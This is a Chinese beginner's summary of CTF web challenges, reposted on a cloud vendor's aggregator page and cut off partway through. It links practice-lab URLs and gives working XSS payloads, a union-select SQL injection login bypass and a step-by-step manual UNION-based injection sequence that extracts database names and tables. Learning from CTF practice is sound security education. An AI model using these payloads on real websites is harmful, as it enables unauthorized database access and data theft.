CTF web總結(入門)

來源:互聯網
上載者:User

本文連結:http://blog.csdn.net/u012763794/article/details/50959166

本文根據自己的做題經驗及各大練習平台不斷更新,若我最近懶了,沒怎麼更新,請在下面提醒我或鼓勵我

僅作為自己的筆記及剛入門的童鞋,大牛勿噴 基礎篇
1.直接查看原始碼
http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php

2.修改或添加HTTP要求標頭
常見的有: Referer來源偽造
X-Forwarded-For:ip偽造 User-Agent:使用者代理程式(就是用什麼瀏覽器什麼的)
http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php
//.net的版本修改,後面添加,如版本9 .NET CLR 9

Accept-Language:語言
http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php
http://ctf1.shiyanbar.com/basic/header/
Cookie的修改
http://lab1.xseclab.com/base9_ab629d778e3a29540dfd60f2e548a5eb/index.php


3.查看HTTP要求標頭或回應標頭
http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php
http://ctf1.shiyanbar.com/basic/catch/

4.302跳轉的中轉網頁有資訊 http://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/index.php

5.查看開發人員工具控制台
6.javascript代碼繞過
通過刪除或修改代碼或者本地代理改包繞過 http://lab1.xseclab.com/base10_0b4e4866096913ac9c3a2272dde27215/index.php
7.使用burp的repeater查看整個HTTP包 http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

8.閱讀javascript代碼,直接控制台擷取正確密碼 http://ctf1.shiyanbar.com/basic/js/index.asp

9.robots.txt檔案擷取資訊 這本來是給搜尋引擎看的資訊,很可能暴露網站結構目錄 http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b/index.php

10..bash_history,這個應該說看到過吧,就是記錄使用者輸入過的linux命令的
前端指令碼類
js加解密 http://ctf5.shiyanbar.com/DUTCTF/1.html  //直接在F12控制台粘貼就有了

XSS http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
這題題目就有漏洞,直接在命令列輸入下面的就有了 [javascript]  view plain  copy $.post("./getkey.php?ok=1",{'url':location.href,'ok':ok},function(data){               console.log(data);           });   showkey();   當然簡單的直接輸入 [javascript]  view plain  copy <script>alert(HackingLab)</script>   這樣也可以

這題也差不多
http://lab1.xseclab.com/realxss2_bcedaba7e8618cdfb51178765060fc7d/index.php
可以直接輸入上題的那個jquery,也可以乖乖下面的 [html]  view plain  copy <img src="11" onerror=alert(HackingLab)>  
http://lab1.xseclab.com/realxss3_9b28b0ff93d0b0099f5ac7f8bad3f368/index.php


後端指令碼類
代碼審計 asp代碼審計: 1.http://ctf8.shiyanbar.com/aspaudit/   長度限制:F12刪maxlength,或者改長度,本地代理都可以繞過 //Username:  'union  select 1,1,1 from bdmin '  ,為什麼是三列呢,一般表中都會設定id,加上帳號密碼就3個了,不行就猜4列咯...,因為union的之前的使用者名稱為空白,所以前面的結果集為空白,所以最後的結果集只有我們後面的1,1,1了,所以在密碼那輸入1就是密碼。
  這樣也行,反正就閉合標籤   'union  select 1,1,1 from bdmin where '1'='1
php代碼審計 1.http://ctf8.shiyanbar.com/phpaudit/ //其實這個就是修改http要求標頭的X-Forwarded-For 2.http://ctf1.shiyanbar.com/web/4/index.php //跟下面的後台登陸型第一個一樣,請看下面的後台登陸型第一個
3.http://ctf5.shiyanbar.com/DUTCTF/index.php //二次urlencode
4.http://ctf1.shiyanbar.com/web/5/index.php //請看後台登陸型第二個
5.http://ctf4.shiyanbar.com/web/false.php //數組的雜湊值,都是null 6.http://ctf4.shiyanbar.com/web/Session.php //只需要在 第一次提交的時候直接提交password=即可,因為第一次訪問時伺服器那邊也沒設定對應的$_SESSION['password'],由於是==比較,兩者是相等的。

表單隱藏 http://ctf10.shiyanbar.com:8888/main.php

sql注入 簡單的直接上工具就ko了,如sqlmap,等-—— 10大sql注入工具 如下面幾個: 1.http://ctf5.shiyanbar.com:8080/9/asp.asp

2.http://ctf5.shiyanbar.com/8/index.php?id=1 當然不用and XX也是可以的,下面只是舉個例子 [php]  view plain  copy //手工注入過程   //判斷注入類型為and布爾型注入   http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=1   http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2   //判斷欄位數   http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%203   http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%202   //擷取資料庫基本資料(//concat_ws是字串串連函數,其中第一個參數是分隔字元,CHAR(58)是冒號,因為冒號的ASCII是58)   http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,concat_ws(CHAR(58),user(),database(),version())    //擷取資料庫中的表,其中table_schema可以理解為資料庫吧(他是mysql系統資料表裡面的一個欄位,這裡我們用16進位表示,就是上一句查詢到的資料庫)   http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x6d795f6462   //擷取重要表的欄位   http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,col

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.